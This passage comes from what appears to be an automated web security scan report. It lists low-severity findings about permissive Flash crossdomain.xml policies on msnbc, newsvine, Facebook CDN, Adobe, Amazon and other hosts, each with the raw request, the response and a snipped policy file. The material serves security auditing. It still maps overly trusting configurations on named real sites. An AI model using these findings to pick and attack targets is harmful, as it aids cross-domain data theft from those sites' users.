The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:12 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.75. http://redtape.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: redtape.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:24 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=981
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.76. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:24:11 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

6.77. http://suzanne-choney.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: suzanne-choney.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:29 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=980
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.78. http://technolog2.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: technolog2.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:39 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=990
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.79. http://thelastword.msnbc.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: thelastword.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:55:26 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.80. http://today.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://today.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:38 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.81. http://toddkenreck.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: toddkenreck.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:49 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=990
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.82. http://top.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://top.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: top.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:28 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.83. http://tv.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tv.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:27 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.84. http://wbenedetti.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wbenedetti.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:14 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=999
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.85. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Sat, 29 Jan 2011 20:53:25 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sun, 30 Jan 2011 01:52:11 GMT
Age: 196
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

6.86. http://www.amazon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:31 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="amazon.com" />
...[SNIP]...
<allow-access-from domain="pre-prod.amazon.com" />
<allow-access-from domain="devo.amazon.com" />
<allow-access-from domain="anon.amazon.speedera.net" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.ssl-images-amazon.com" />
<allow-access-from domain="*.amazon.ca" />
<allow-access-from domain="*.amazon.cn" />
<allow-access-from domain="*.amazon.de" />
<allow-access-from domain="*.amazon.fr" />
<allow-access-from domain="*.amazon.it" />
<allow-access-from domain="*.amazon.jp" />
<allow-access-from domain="*.amazon.co.jp" />
<allow-access-from domain="*.amazon.uk" />
<allow-access-from domain="*.amazon.co.uk" />
...[SNIP]...

6.87. http://www.blackvoices.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackvoices.com

Response

HTTP/1.0 200 OK
set-cookie: dcisid=2393099708.970474317.4095214336; path=/
MIME-Version: 1.0
